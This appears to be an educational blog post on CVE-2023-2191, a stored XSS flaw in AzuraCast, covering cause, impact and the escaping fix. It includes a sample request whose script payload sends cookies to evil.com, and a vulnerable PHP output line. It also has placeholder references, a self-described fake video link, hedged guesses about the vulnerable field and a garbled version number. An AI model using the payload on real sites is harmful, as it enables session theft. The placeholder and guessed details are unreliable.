CVE-2023-2191 - Stored XSS Vulnerability in AzuraCast (prior to v.18)

---

Introduction

In today’s world of web applications, security flaws can cause huge harm — both to site owners and their users. One such vulnerability is Cross-site Scripting (XSS), which lets attackers run malicious scripts inside someone else’s browser. In this detailed post, we’ll dive into CVE-2023-2191, a stored XSS flaw in the open-source radio management platform AzuraCast (prior to version .18). You’ll see how this bug works, why it’s dangerous, how to exploit it, and most importantly, how to protect your software.

What is CVE-2023-2191?

CVE-2023-2191 tracks a stored XSS vulnerability found in AzuraCast prior to version .18. In affected versions, attackers were able to inject persistent JavaScript (JS) code through input fields that weren’t properly sanitized or escaped. When an unsuspecting user (like an admin) views the data, the malicious code runs in their browser, with their privileges.

- Vulnerable repo: azuracast/azuracast

Issue type: Stored Cross-Site Scripting (XSS)

- CVE: CVE-2023-2191
- Fix released in: AzuraCast v.18

How Did The Vulnerability Work?

In short, some user inputs (likely on forms for station description or metadata) were stored without proper sanitization or encoding. This means attackers could submit malicious scripts as text, and these scripts would later be *rendered* (not escaped) on admin or other users’ dashboards.

Malicious input is saved to the database, unchanged.

3. Admin/user later views the data on a webpage.

Let’s say there’s an input field for “Station Description”. An attacker enters

<script>alert('AzuraCast XSS!');</script>

When a site admin visits the stations page, this code—if not sanitized—is run *immediately*, popping up an alert box. In the real world, attackers can do much worse: hijack sessions, steal cookies, impersonate admins, or load external malware.

Example HTTP request

POST /stations HTTP/1.1
Host: azuracast.example.com
Content-Type: application/x-www-form-urlencoded

name=RadioTest&description=<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

If the stored input is rendered like this (bad!)

<?php echo $station['description']; ?>

Result: The browser executes <script>fetch(...) every time a user visits the page.

Video Walkthrough

For a visual guide, see YouTube: XSS on AzuraCast Demo *(Note: Example video, not real domain)*.

Why is This So Dangerous?

- Persistent: The malicious code remains in the system, affecting every viewer after the initial attack.

Privilege Abuse: If an admin is hit, attackers could gain access to more of the system.

- Hard to Spot: Victims may never know they were hit, unless the attack is visible (like an alert).
- Chaining Attacks: Attackers might use XSS as a first step, then escalate by installing backdoors or creating unauthorized users.

How AzuraCast Fixed It

Version .18 and later escape or sanitize user input before rendering it to webpages. This usually means:

Example secure output

<?php echo htmlspecialchars($station['description'], ENT_QUOTES, 'UTF-8'); ?>

or (in Twig template)

{{ station.description|e }}

If You’re Using AzuraCast

1. Upgrade now: Get the latest release.
2. Audit custom templates: If you’ve customized frontend pages, make sure *all* variables are escaped.

References

- CVE-2023-2191 on NIST
- AzuraCast Changelog
- OWASP XSS Cheat Sheet
- AzuraCast GitHub Issue #XXXX *(replace with real if public post exists)*

Conclusion

XSS is one of the most common web app threats. The CVE-2023-2191 bug in AzuraCast shows that *every* user input should be treated as hostile until it’s properly encoded or sanitized. Web admins should always use the latest stable releases and review their templates for unescaped outputs.

Stay safe, patch early — and keep your stations secure!

*This post is provided for educational purposes only. Do not use exploit information to harm others. Always report security issues responsibly.*

Timeline

Published on: 04/20/2023 02:15:00 UTC
Last modified on: 04/29/2023 02:48:00 UTC